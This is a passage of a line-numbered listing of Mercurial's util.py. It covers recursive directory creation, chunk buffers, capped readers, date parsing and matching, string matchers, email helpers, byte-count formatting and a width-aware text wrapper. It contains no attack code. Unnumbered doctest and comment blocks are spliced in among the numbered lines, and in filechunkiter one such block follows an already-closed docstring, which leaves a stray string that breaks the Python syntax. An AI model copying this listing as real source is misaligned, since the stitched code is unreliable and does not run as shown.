1844 1844 """recursive directory creation with parent mode inheritance
1845 1845
1846 1846 Newly created directories are marked as "not to be indexed by
1847 1847 the content indexing service", if ``notindexed`` is specified
1848 1848 for "write" mode access.
1849 1849 """
1850 1850 try:
1851 1851 makedir(name, notindexed)
1852 1852 except OSError as err:
1853 1853 if err.errno == errno.EEXIST:
1854 1854 return
1855 1855 if err.errno != errno.ENOENT or not name:
1856 1856 raise
1857 1857 parent = os.path.dirname(os.path.abspath(name))
1858 1858 if parent == name:
1859 1859 raise
1860 1860 makedirs(parent, mode, notindexed)
1861 1861 try:
1862 1862 makedir(name, notindexed)
1863 1863 except OSError as err:
1864 1864 # Catch EEXIST to handle races
1865 1865 if err.errno == errno.EEXIST:
1866 1866 return
1867 1867 raise
1868 1868 if mode is not None:
1869 1869 os.chmod(name, mode)
1870 1870
1871 1871 def readfile(path):
1872 1872 with open(path, 'rb') as fp:
1873 1873 return fp.read()
1874 1874
1875 1875 def writefile(path, text):
1876 1876 with open(path, 'wb') as fp:
1877 1877 fp.write(text)
1878 1878
1879 1879 def appendfile(path, text):
1880 1880 with open(path, 'ab') as fp:
1881 1881 fp.write(text)
1882 1882
1883 1883 class chunkbuffer(object):
1884 1884 """Allow arbitrary sized chunks of data to be efficiently read from an
1885 1885 iterator over chunks of arbitrary size.
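
    For example (an illustrative doctest; reads may span chunk
    boundaries):

    >>> cb = chunkbuffer(iter([b'one', b'two', b'three']))
    >>> cb.read(5)
    'onetw'
    >>> cb.read(100)
    'othree'
    """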
1886 1886
1887 1887 def __init__(self, in_iter):
1888 1888 """in_iter is the iterator that's iterating over the input chunks."""
1889 1889 def splitbig(chunks):
1890 1890 for chunk in chunks:
1891 1891 if len(chunk) > 2**20:
1892 1892 pos = 0
1893 1893 while pos < len(chunk):
1894 1894 end = pos + 2 ** 18
1895 1895 yield chunk[pos:end]
1896 1896 pos = end
1897 1897 else:
1898 1898 yield chunk
1899 1899 self.iter = splitbig(in_iter)
1900 1900 self._queue = collections.deque()
1901 1901 self._chunkoffset = 0
1902 1902
1903 1903 def read(self, l=None):
1904 1904 """Read L bytes of data from the iterator of chunks of data.
1905 1905 Returns less than L bytes if the iterator runs dry.
1906 1906
1907 1907 If size parameter is omitted, read everything"""
1908 1908 if l is None:
1909 1909 return ''.join(self.iter)
1910 1910
1911 1911 left = l
1912 1912 buf = []
1913 1913 queue = self._queue
1914 1914 while left > 0:
1915 1915 # refill the queue
1916 1916 if not queue:
1917 1917 target = 2**18
1918 1918 for chunk in self.iter:
1919 1919 queue.append(chunk)
1920 1920 target -= len(chunk)
1921 1921 if target <= 0:
1922 1922 break
1923 1923 if not queue:
1924 1924 break
1925 1925
1926 1926 # The easy way to do this would be to queue.popleft(), modify the
1927 1927 # chunk (if necessary), then queue.appendleft(). However, for cases
1928 1928 # where we read partial chunk content, this incurs 2 dequeue
1929 1929 # mutations and creates a new str for the remaining chunk in the
1930 1930 # queue. Our code below avoids this overhead.
1931 1931
1932 1932 chunk = queue[0]
1933 1933 chunkl = len(chunk)
1934 1934 offset = self._chunkoffset
1935 1935
1936 1936 # Use full chunk.
1937 1937 if offset == 0 and left >= chunkl:
1938 1938 left -= chunkl
1939 1939 queue.popleft()
1940 1940 buf.append(chunk)
1941 1941 # self._chunkoffset remains at 0.
1942 1942 continue
1943 1943
1944 1944 chunkremaining = chunkl - offset
1945 1945
1946 1946 # Use all of unconsumed part of chunk.
1947 1947 if left >= chunkremaining:
1948 1948 left -= chunkremaining
1949 1949 queue.popleft()
1950 1950 # The offset == 0 case was handled by the block above, so this
1951 1951 # won't merely copy via ``chunk[0:]``.
1952 1952 buf.append(chunk[offset:])
1953 1953 self._chunkoffset = 0
1954 1954
1955 1955 # Partial chunk needed.
1956 1956 else:
1957 1957 buf.append(chunk[offset:offset + left])
1958 1958 self._chunkoffset += left
1959 1959 left -= chunkremaining
1960 1960
1961 1961 return ''.join(buf)
1962 1962
1963 1963 def filechunkiter(f, size=131072, limit=None):
1964 1964 """Create a generator that produces the data in the file size
1965 1965 (default 131072) bytes at a time, up to optional limit (default is
1966 1966 to read all data). Chunks may be less than size bytes if the
1967 1967 chunk is the last chunk in the file, or the file is a socket or
1968 1968 some other type of file that sometimes reads less data than is
1969 1969 requested."""
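
    Illustrative doctests:

    >>> list(filechunkiter(stringio(b'abcdefg'), size=3))
    ['abc', 'def', 'g']
    >>> list(filechunkiter(stringio(b'abcdefg'), size=3, limit=5))
    ['abc', 'de']
    """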
1970 1970 assert size >= 0
1971 1971 assert limit is None or limit >= 0
1972 1972 while True:
1973 1973 if limit is None:
1974 1974 nbytes = size
1975 1975 else:
1976 1976 nbytes = min(limit, size)
1977 1977 s = nbytes and f.read(nbytes)
1978 1978 if not s:
1979 1979 break
1980 1980 if limit:
1981 1981 limit -= len(s)
1982 1982 yield s
1983 1983
1984 1984 class cappedreader(object):
1985 1985 """A file object proxy that allows reading up to N bytes.
1986 1986
1987 1987 Given a source file object, instances of this type allow reading up to
1988 1988 N bytes from that source file object. Attempts to read past the allowed
1989 1989 limit are treated as EOF.
1990 1990
1991 1991 It is assumed that I/O is not performed on the original file object
1992 1992 in addition to I/O that is performed by this instance. If there is,
1993 1993 state tracking will get out of sync and unexpected results will ensue.
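
    For example (illustrative):

    >>> cr = cappedreader(stringio(b'0123456789'), 4)
    >>> cr.read(3)
    '012'
    >>> cr.read()
    '3'
    >>> cr.read()
    ''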
1994 1994 """
1995 1995 def __init__(self, fh, limit):
1996 1996 """Allow reading up to <limit> bytes from <fh>."""
1997 1997 self._fh = fh
1998 1998 self._left = limit
1999 1999
2000 2000 def read(self, n=-1):
2001 2001 if not self._left:
2002 2002 return b''
2003 2003
2004 2004 if n < 0:
2005 2005 n = self._left
2006 2006
2007 2007 data = self._fh.read(min(n, self._left))
2008 2008 self._left -= len(data)
2009 2009 assert self._left >= 0
2010 2010
2011 2011 return data
2012 2012
2013 2013 def makedate(timestamp=None):
2014 2014 '''Return a unix timestamp (or the current time) as a (unixtime,
2015 2015 offset) tuple based on the local timezone.'''
2016 2016 if timestamp is None:
2017 2017 timestamp = time.time()
2018 2018 if timestamp < 0:
2019 2019 hint = _("check your clock")
2020 2020 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2021 2021 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2022 2022 datetime.datetime.fromtimestamp(timestamp))
2023 2023 tz = delta.days * 86400 + delta.seconds
2024 2024 return timestamp, tz
2025 2025
2026 2026 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2027 2027 """represent a (unixtime, offset) tuple as a localized time.
2028 2028 unixtime is seconds since the epoch, and offset is the time zone's
2029 2029 number of seconds away from UTC.
2030 2030
2031 2031 >>> datestr((0, 0))
2032 2032 'Thu Jan 01 00:00:00 1970 +0000'
2033 2033 >>> datestr((42, 0))
2034 2034 'Thu Jan 01 00:00:42 1970 +0000'
2035 2035 >>> datestr((-42, 0))
2036 2036 'Wed Dec 31 23:59:18 1969 +0000'
2037 2037 >>> datestr((0x7fffffff, 0))
2038 2038 'Tue Jan 19 03:14:07 2038 +0000'
2039 2039 >>> datestr((-0x80000000, 0))
2040 2040 'Fri Dec 13 20:45:52 1901 +0000'
2041 2041 """
2042 2042 t, tz = date or makedate()
2043 2043 if "%1" in format or "%2" in format or "%z" in format:
2044 2044 sign = (tz > 0) and "-" or "+"
2045 2045 minutes = abs(tz) // 60
2046 2046 q, r = divmod(minutes, 60)
2047 2047 format = format.replace("%z", "%1%2")
2048 2048 format = format.replace("%1", "%c%02d" % (sign, q))
2049 2049 format = format.replace("%2", "%02d" % r)
2050 2050 d = t - tz
2051 2051 if d > 0x7fffffff:
2052 2052 d = 0x7fffffff
2053 2053 elif d < -0x80000000:
2054 2054 d = -0x80000000
2055 2055 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2056 2056 # because they use the gmtime() system call which is buggy on Windows
2057 2057 # for negative values.
2058 2058 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2059 2059 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2060 2060 return s
2061 2061
2062 2062 def shortdate(date=None):
2063 2063 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2064 2064 return datestr(date, format='%Y-%m-%d')
2065 2065
2066 2066 def parsetimezone(s):
2067 2067 """find a trailing timezone, if any, in string, and return a
2068 2068 (offset, remainder) pair.
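
    Illustrative doctests:

    >>> parsetimezone(b'2006 +0800')
    (-28800, '2006')
    >>> parsetimezone(b'2006 UTC')
    (0, '2006')
    >>> parsetimezone(b'2006')
    (None, '2006')
    """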
2069 2069
2070 2070 if s.endswith("GMT") or s.endswith("UTC"):
2071 2071 return 0, s[:-3].rstrip()
2072 2072
2073 2073 # Unix-style timezones [+-]hhmm
2074 2074 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2075 2075 sign = (s[-5] == "+") and 1 or -1
2076 2076 hours = int(s[-4:-2])
2077 2077 minutes = int(s[-2:])
2078 2078 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2079 2079
2080 2080 # ISO8601 trailing Z
2081 2081 if s.endswith("Z") and s[-2:-1].isdigit():
2082 2082 return 0, s[:-1]
2083 2083
2084 2084 # ISO8601-style [+-]hh:mm
2085 2085 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2086 2086 s[-5:-3].isdigit() and s[-2:].isdigit()):
2087 2087 sign = (s[-6] == "+") and 1 or -1
2088 2088 hours = int(s[-5:-3])
2089 2089 minutes = int(s[-2:])
2090 2090 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2091 2091
2092 2092 return None, s
2093 2093
2094 2094 def strdate(string, format, defaults=None):
2095 2095 """parse a localized time string and return a (unixtime, offset) tuple.
2096 2096 if the string cannot be parsed, ValueError is raised."""
2097 2097 if defaults is None:
2098 2098 defaults = {}
2099 2099
2100 2100 # NOTE: unixtime = localunixtime + offset
2101 2101 offset, date = parsetimezone(string)
2102 2102
2103 2103 # add missing elements from defaults
2104 2104 usenow = False # default to using biased defaults
2105 2105 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2106 2106 part = pycompat.bytestr(part)
2107 2107 found = [True for p in part if ("%"+p) in format]
2108 2108 if not found:
2109 2109 date += "@" + defaults[part][usenow]
2110 2110 format += "@%" + part[0]
2111 2111 else:
2112 2112 # We've found a specific time element, less specific time
2113 2113 # elements are relative to today
2114 2114 usenow = True
2115 2115
2116 2116 timetuple = time.strptime(encoding.strfromlocal(date),
2117 2117 encoding.strfromlocal(format))
2118 2118 localunixtime = int(calendar.timegm(timetuple))
2119 2119 if offset is None:
2120 2120 # local timezone
2121 2121 unixtime = int(time.mktime(timetuple))
2122 2122 offset = unixtime - localunixtime
2123 2123 else:
2124 2124 unixtime = localunixtime + offset
2125 2125 return unixtime, offset
2126 2126
2127 2127 def parsedate(date, formats=None, bias=None):
2128 2128 """parse a localized date/time and return a (unixtime, offset) tuple.
2129 2129
2130 2130 The date may be a "unixtime offset" string or in one of the specified
2131 2131 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2132 2132
2133 2133 >>> parsedate(b' today ') == parsedate(
2134 2134 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2135 2135 True
2136 2136 >>> parsedate(b'yesterday ') == parsedate(
2137 2137 ... (datetime.date.today() - datetime.timedelta(days=1)
2138 2138 ... ).strftime('%b %d').encode('ascii'))
2139 2139 True
2140 2140 >>> now, tz = makedate()
2141 2141 >>> strnow, strtz = parsedate(b'now')
2142 2142 >>> (strnow - now) < 1
2143 2143 True
2144 2144 >>> tz == strtz
2145 2145 True
2146 2146 """
2147 2147 if bias is None:
2148 2148 bias = {}
2149 2149 if not date:
2150 2150 return 0, 0
2151 2151 if isinstance(date, tuple) and len(date) == 2:
2152 2152 return date
2153 2153 if not formats:
2154 2154 formats = defaultdateformats
2155 2155 date = date.strip()
2156 2156
2157 2157 if date == 'now' or date == _('now'):
2158 2158 return makedate()
2159 2159 if date == 'today' or date == _('today'):
2160 2160 date = datetime.date.today().strftime(r'%b %d')
2161 2161 date = encoding.strtolocal(date)
2162 2162 elif date == 'yesterday' or date == _('yesterday'):
2163 2163 date = (datetime.date.today() -
2164 2164 datetime.timedelta(days=1)).strftime(r'%b %d')
2165 2165 date = encoding.strtolocal(date)
2166 2166
2167 2167 try:
2168 2168 when, offset = map(int, date.split(' '))
2169 2169 except ValueError:
2170 2170 # fill out defaults
2171 2171 now = makedate()
2172 2172 defaults = {}
2173 2173 for part in ("d", "mb", "yY", "HI", "M", "S"):
2174 2174 # this piece is for rounding the specific end of unknowns
2175 2175 b = bias.get(part)
2176 2176 if b is None:
2177 2177 if part[0:1] in "HMS":
2178 2178 b = "00"
2179 2179 else:
2180 2180 b = "0"
2181 2181
2182 2182 # this piece is for matching the generic end to today's date
2183 2183 n = datestr(now, "%" + part[0:1])
2184 2184
2185 2185 defaults[part] = (b, n)
2186 2186
2187 2187 for format in formats:
2188 2188 try:
2189 2189 when, offset = strdate(date, format, defaults)
2190 2190 except (ValueError, OverflowError):
2191 2191 pass
2192 2192 else:
2193 2193 break
2194 2194 else:
2195 2195 raise error.ParseError(_('invalid date: %r') % date)
2196 2196 # validate explicit (probably user-specified) date and
2197 2197 # time zone offset. values must fit in signed 32 bits for
2198 2198 # current 32-bit linux runtimes. timezones go from UTC-12
2199 2199 # to UTC+14
2200 2200 if when < -0x80000000 or when > 0x7fffffff:
2201 2201 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2202 2202 if offset < -50400 or offset > 43200:
2203 2203 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2204 2204 return when, offset
2205 2205
2206 2206 def matchdate(date):
2207 2207 """Return a function that matches a given date match specifier
2208 2208
2209 2209 Formats include:
2210 2210
2211 2211 '{date}' match a given date to the accuracy provided
2212 2212
2213 2213 '<{date}' on or before a given date
2214 2214
2215 2215 '>{date}' on or after a given date
2216 2216
2217 2217 >>> p1 = parsedate(b"10:29:59")
2218 2218 >>> p2 = parsedate(b"10:30:00")
2219 2219 >>> p3 = parsedate(b"10:30:59")
2220 2220 >>> p4 = parsedate(b"10:31:00")
2221 2221 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2222 2222 >>> f = matchdate(b"10:30")
2223 2223 >>> f(p1[0])
2224 2224 False
2225 2225 >>> f(p2[0])
2226 2226 True
2227 2227 >>> f(p3[0])
2228 2228 True
2229 2229 >>> f(p4[0])
2230 2230 False
2231 2231 >>> f(p5[0])
2232 2232 False
2233 2233 """
2234 2234
2235 2235 def lower(date):
2236 2236 d = {'mb': "1", 'd': "1"}
2237 2237 return parsedate(date, extendeddateformats, d)[0]
2238 2238
2239 2239 def upper(date):
2240 2240 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2241 2241 for days in ("31", "30", "29"):
2242 2242 try:
2243 2243 d["d"] = days
2244 2244 return parsedate(date, extendeddateformats, d)[0]
2245 2245 except error.ParseError:
2246 2246 pass
2247 2247 d["d"] = "28"
2248 2248 return parsedate(date, extendeddateformats, d)[0]
2249 2249
2250 2250 date = date.strip()
2251 2251
2252 2252 if not date:
2253 2253 raise Abort(_("dates cannot consist entirely of whitespace"))
2254 2254 elif date[0] == "<":
2255 2255 if not date[1:]:
2256 2256 raise Abort(_("invalid day spec, use '<DATE'"))
2257 2257 when = upper(date[1:])
2258 2258 return lambda x: x <= when
2259 2259 elif date[0] == ">":
2260 2260 if not date[1:]:
2261 2261 raise Abort(_("invalid day spec, use '>DATE'"))
2262 2262 when = lower(date[1:])
2263 2263 return lambda x: x >= when
2264 2264 elif date[0] == "-":
2265 2265 try:
2266 2266 days = int(date[1:])
2267 2267 except ValueError:
2268 2268 raise Abort(_("invalid day spec: %s") % date[1:])
2269 2269 if days < 0:
2270 2270 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2271 2271 % date[1:])
2272 2272 when = makedate()[0] - days * 3600 * 24
2273 2273 return lambda x: x >= when
2274 2274 elif " to " in date:
2275 2275 a, b = date.split(" to ")
2276 2276 start, stop = lower(a), upper(b)
2277 2277 return lambda x: x >= start and x <= stop
2278 2278 else:
2279 2279 start, stop = lower(date), upper(date)
2280 2280 return lambda x: x >= start and x <= stop
2281 2281
2282 2282 def stringmatcher(pattern, casesensitive=True):
2283 2283 """
2284 2284 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 2285 returns the matcher name, pattern, and matcher function.
2286 2286 missing or unknown prefixes are treated as literal matches.
2287 2287
2288 2288 helper for tests:
2289 2289 >>> def test(pattern, *tests):
2290 2290 ... kind, pattern, matcher = stringmatcher(pattern)
2291 2291 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 2292 >>> def itest(pattern, *tests):
2293 2293 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 2294 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 2295
2296 2296 exact matching (no prefix):
2297 2297 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 2298 ('literal', 'abcdefg', [False, False, True])
2299 2299
2300 2300 regex matching ('re:' prefix)
2301 2301 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 2302 ('re', 'a.+b', [False, False, True])
2303 2303
2304 2304 force exact matches ('literal:' prefix)
2305 2305 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 2306 ('literal', 're:foobar', [False, True])
2307 2307
2308 2308 unknown prefixes are ignored and treated as literals
2309 2309 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 2310 ('literal', 'foo:bar', [False, False, True])
2311 2311
2312 2312 case insensitive regex matches
2313 2313 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 2314 ('re', 'A.+b', [False, False, True])
2315 2315
2316 2316 case insensitive literal matches
2317 2317 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 2318 ('literal', 'ABCDEFG', [False, False, True])
2319 2319 """
2320 2320 if pattern.startswith('re:'):
2321 2321 pattern = pattern[3:]
2322 2322 try:
2323 2323 flags = 0
2324 2324 if not casesensitive:
2325 2325 flags = remod.I
2326 2326 regex = remod.compile(pattern, flags)
2327 2327 except remod.error as e:
2328 2328 raise error.ParseError(_('invalid regular expression: %s')
2329 2329 % e)
2330 2330 return 're', pattern, regex.search
2331 2331 elif pattern.startswith('literal:'):
2332 2332 pattern = pattern[8:]
2333 2333
2334 2334 match = pattern.__eq__
2335 2335
2336 2336 if not casesensitive:
2337 2337 ipat = encoding.lower(pattern)
2338 2338 match = lambda s: ipat == encoding.lower(s)
2339 2339 return 'literal', pattern, match
2340 2340
2341 2341 def shortuser(user):
2342 2342 """Return a short representation of a user name or email address."""
2343 2343 f = user.find('@')
2344 2344 if f >= 0:
2345 2345 user = user[:f]
2346 2346 f = user.find('<')
2347 2347 if f >= 0:
2348 2348 user = user[f + 1:]
2349 2349 f = user.find(' ')
2350 2350 if f >= 0:
2351 2351 user = user[:f]
2352 2352 f = user.find('.')
2353 2353 if f >= 0:
2354 2354 user = user[:f]
2355 2355 return user
2356 2356
2357 2357 def emailuser(user):
2358 2358 """Return the user portion of an email address."""
2359 2359 f = user.find('@')
2360 2360 if f >= 0:
2361 2361 user = user[:f]
2362 2362 f = user.find('<')
2363 2363 if f >= 0:
2364 2364 user = user[f + 1:]
2365 2365 return user
2366 2366
2367 2367 def email(author):
2368 2368 '''get the email of an author.
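
    Examples (illustrative):

    >>> email(b'John Doe <john.doe@example.com>')
    'john.doe@example.com'
    >>> email(b'john.doe@example.com')
    'john.doe@example.com'
    '''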
2369 2369 r = author.find('>')
2370 2370 if r == -1:
2371 2371 r = None
2372 2372 return author[author.find('<') + 1:r]
2373 2373
2374 2374 def ellipsis(text, maxlength=400):
2375 2375 """Trim string to at most maxlength (default: 400) columns in display."""
2376 2376 return encoding.trim(text, maxlength, ellipsis='...')
2377 2377
2378 2378 def unitcountfn(*unittable):
2379 2379 '''return a function that renders a readable count of some quantity'''
2380 2380
2381 2381 def go(count):
2382 2382 for multiplier, divisor, format in unittable:
2383 2383 if abs(count) >= divisor * multiplier:
2384 2384 return format % (count / float(divisor))
2385 2385 return unittable[-1][2] % count
2386 2386
2387 2387 return go
2388 2388
2389 2389 def processlinerange(fromline, toline):
2390 2390 """Check that linerange <fromline>:<toline> makes sense and return a
2391 2391 0-based range.
2392 2392
2393 2393 >>> processlinerange(10, 20)
2394 2394 (9, 20)
2395 2395 >>> processlinerange(2, 1)
2396 2396 Traceback (most recent call last):
2397 2397 ...
2398 2398 ParseError: line range must be positive
2399 2399 >>> processlinerange(0, 5)
2400 2400 Traceback (most recent call last):
2401 2401 ...
2402 2402 ParseError: fromline must be strictly positive
2403 2403 """
2404 2404 if toline - fromline < 0:
2405 2405 raise error.ParseError(_("line range must be positive"))
2406 2406 if fromline < 1:
2407 2407 raise error.ParseError(_("fromline must be strictly positive"))
2408 2408 return fromline - 1, toline
2409 2409
2410 2410 bytecount = unitcountfn(
2411 2411 (100, 1 << 30, _('%.0f GB')),
2412 2412 (10, 1 << 30, _('%.1f GB')),
2413 2413 (1, 1 << 30, _('%.2f GB')),
2414 2414 (100, 1 << 20, _('%.0f MB')),
2415 2415 (10, 1 << 20, _('%.1f MB')),
2416 2416 (1, 1 << 20, _('%.2f MB')),
2417 2417 (100, 1 << 10, _('%.0f KB')),
2418 2418 (10, 1 << 10, _('%.1f KB')),
2419 2419 (1, 1 << 10, _('%.2f KB')),
2420 2420 (1, 1, _('%.0f bytes')),
2421 2421 )
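
# Illustrative sample values (assuming _() is the identity, i.e. the C
# locale):
#   bytecount(4096)      -> '4.00 KB'
#   bytecount(123456789) -> '118 MB'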
2422 2422
2423 2423 # Matches a single EOL which can either be a CRLF where repeated CR
2424 2424 # are removed or a LF. We do not care about old Macintosh files, so a
2425 2425 # stray CR is an error.
2426 2426 _eolre = remod.compile(br'\r*\n')
2427 2427
2428 2428 def tolf(s):
2429 2429 return _eolre.sub('\n', s)
2430 2430
2431 2431 def tocrlf(s):
2432 2432 return _eolre.sub('\r\n', s)
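
# Illustrative conversions: tolf(b'a\r\n\r\nb\n') -> b'a\n\nb\n' and
# tocrlf(b'a\nb\n') -> b'a\r\nb\r\n'; a stray CR not followed by a LF is
# left untouched.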
2433 2433
2434 2434 if pycompat.oslinesep == '\r\n':
2435 2435 tonativeeol = tocrlf
2436 2436 fromnativeeol = tolf
2437 2437 else:
2438 2438 tonativeeol = pycompat.identity
2439 2439 fromnativeeol = pycompat.identity
2440 2440
2441 2441 def escapestr(s):
2442 2442 # call underlying function of s.encode('string_escape') directly for
2443 2443 # Python 3 compatibility
2444 2444 return codecs.escape_encode(s)[0]
2445 2445
2446 2446 def unescapestr(s):
2447 2447 return codecs.escape_decode(s)[0]
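
# For instance (illustrative): escapestr(b'1\n2') -> b'1\\n2' and
# unescapestr(b'1\\n2') -> b'1\n2'.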
2448 2448
2449 2449 def forcebytestr(obj):
2450 2450 """Portably format an arbitrary object (e.g. exception) into a byte
2451 2451 string."""
2452 2452 try:
2453 2453 return pycompat.bytestr(obj)
2454 2454 except UnicodeEncodeError:
2455 2455 # non-ascii string, may be lossy
2456 2456 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457 2457
2458 2458 def uirepr(s):
2459 2459 # Avoid double backslash in Windows path repr()
2460 2460 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461 2461
2462 2462 # delay import of textwrap
2463 2463 def MBTextWrapper(**kwargs):
2464 2464 class tw(textwrap.TextWrapper):
2465 2465 """
2466 2466 Extend TextWrapper for width-awareness.
2467 2467
2468 2468 Neither the number of 'bytes' in any encoding nor the number of
2469 2469 'characters' is appropriate for calculating the terminal columns of a string.
2470 2470
2471 2471 The original TextWrapper implementation uses the built-in 'len()' directly,
2472 2472 so overriding is needed to use the width information of each character.
2473 2473
2474 2474 In addition, characters classified as having 'ambiguous' width are
2475 2475 treated as wide in East Asian locales, but as narrow elsewhere.
2476 2476
2477 2477 This requires a user decision to determine the width of such characters.
2478 2478 """
2479 2479 def _cutdown(self, ucstr, space_left):
2480 2480 l = 0
2481 2481 colwidth = encoding.ucolwidth
2482 2482 for i in xrange(len(ucstr)):
2483 2483 l += colwidth(ucstr[i])
2484 2484 if space_left < l:
2485 2485 return (ucstr[:i], ucstr[i:])
2486 2486 return ucstr, ''
2487 2487
2488 2488 # overriding of base class
2489 2489 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 2490 space_left = max(width - cur_len, 1)
2491 2491
2492 2492 if self.break_long_words:
2493 2493 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 2494 cur_line.append(cut)
2495 2495 reversed_chunks[-1] = res
2496 2496 elif not cur_line:
2497 2497 cur_line.append(reversed_chunks.pop())
2498 2498
2499 2499 # this overriding code is imported from TextWrapper of Python 2.6
2500 2500 # to calculate columns of string by 'encoding.ucolwidth()'
2501 2501 def _wrap_chunks(self, chunks):
2502 2502 colwidth = encoding.ucolwidth
2503 2503
2504 2504 lines = []
2505 2505 if self.width <= 0:
2506 2506 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507 2507
2508 2508 # Arrange in reverse order so items can be efficiently popped
2509 2509 # from a stack of chunks.
2510 2510 chunks.reverse()
2511 2511
2512 2512 while chunks:
2513 2513
2514 2514 # Start the list of chunks that will make up the current line.
2515 2515 # cur_len is just the length of all the chunks in cur_line.
2516 2516 cur_line = []
2517 2517 cur_len = 0
2518 2518
2519 2519 # Figure out which static string will prefix this line.
2520 2520 if lines:
2521 2521 indent = self.subsequent_indent
2522 2522 else:
2523 2523 indent = self.initial_indent
2524 2524
2525 2525 # Maximum width for this line.
2526 2526 width = self.width - len(indent)
2527 2527
2528 2528 # First chunk on line is whitespace -- drop it, unless this
2529 2529 # is the very beginning of the text (i.e. no lines started yet).
2530 2530 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 2531 del chunks[-1]
2532 2532
2533 2533 while chunks:
2534 2534 l = colwidth(chunks[-1])
2535 2535
2536 2536 # Can at least squeeze this chunk onto the current line.
2537 2537 if cur_len + l <= width:
2538 2538 cur_line.append(chunks.pop())
2539 2539 cur_len += l
2540 2540
2541 2541 # Nope, this line is full.
2542 2542 else:
2543 2543 break
2544 2544
2545 2545 # The current line is full, and the next chunk is too big to
2546 2546 # fit on *any* line (not just this one).
2547 2547 if chunks and colwidth(chunks[-1]) > width:
2548 2548 self._handle_long_word(chunks, cur_line, cur_len, width)
2549 2549
2550 2550 # If the last chunk on this line is all whitespace, drop it.
2551 2551 if (self.drop_whitespace and
2552 2552 cur_line and cur_line[-1].strip() == r''):
2553 2553 del cur_line[-1]
2554 2554
2555 2555 # Convert current line back to a string and store it in list
2556 2556 # of all lines (return value).
2557 2557 if cur_line:
2558 2558 lines.append(indent + r''.join(cur_line))
2559 2559
2560 2560 return lines
2561 2561
2562 2562 global MBTextWrapper
2563 2563 MBTextWrapper = tw
2564 2564 return tw(**kwargs)
2565 2565
2566 2566 def wrap(line, width, initindent='', hangindent=''):
2567 2567 maxindent = max(len(hangindent), len(initindent))
2568 2568 if width <= maxindent:
2569 2569 # adjust for weird terminal size
2570 2570 width = max(78, maxindent + 1)
2571 2571 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 2572 pycompat.sysstr(encoding.encodingmode))
2573 2573 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 2574 pycompat.sysstr(encoding.encodingmode))
2575 2575 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 2576 pycompat.sysstr(encoding.encodingmode))
2577 2577 wrapper = MBTextWrapper(width=width,
2578 2578 initial_indent=initindent,
2579 2579 subsequent_indent=hangindent)
2580 2580 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581 2581
2582 2582 if (pyplatform.python_implementation() == 'CPython' and
2583 2583 sys.version_info < (3, 0)):
2584 2584 # There is an issue in CPython that some IO methods do not handle EINTR
2585 2585 # correctly. The following table shows what CPython version (and functions)
2586 2586 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 2587 #
2588 2588 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 2589 # --------------------------------------------------
2590 2590 # fp.__iter__ | buggy | buggy | okay
2591 2591 # fp.read* | buggy | okay [1] | okay
2592 2592 #
2593 2593 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 2594 #
2595 2595 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2596 2596 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 2597 #
2598 2598 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 2599 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 2600 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 2601 # fp.__iter__ but not other fp.read* methods.
2602 2602 #
2603 2603 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 2604 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 2605 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 2606 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 2607 # to minimize the performance impact.
2608 2608 if sys.version_info >= (2, 7, 4):
2609 2609 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 2610 def _safeiterfile(fp):
2611 2611 return iter(fp.readline, '')
2612 2612 else:
2613 2613 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 2614 # note: this may block longer than necessary because of bufsize.
2615 2615 def _safeiterfile(fp, bufsize=4096):
2616 2616 fd = fp.fileno()
2617 2617 line = ''
2618 2618 while True:
2619 2619 try:
2620 2620 buf = os.read(fd, bufsize)
2621 2621 except OSError as ex:
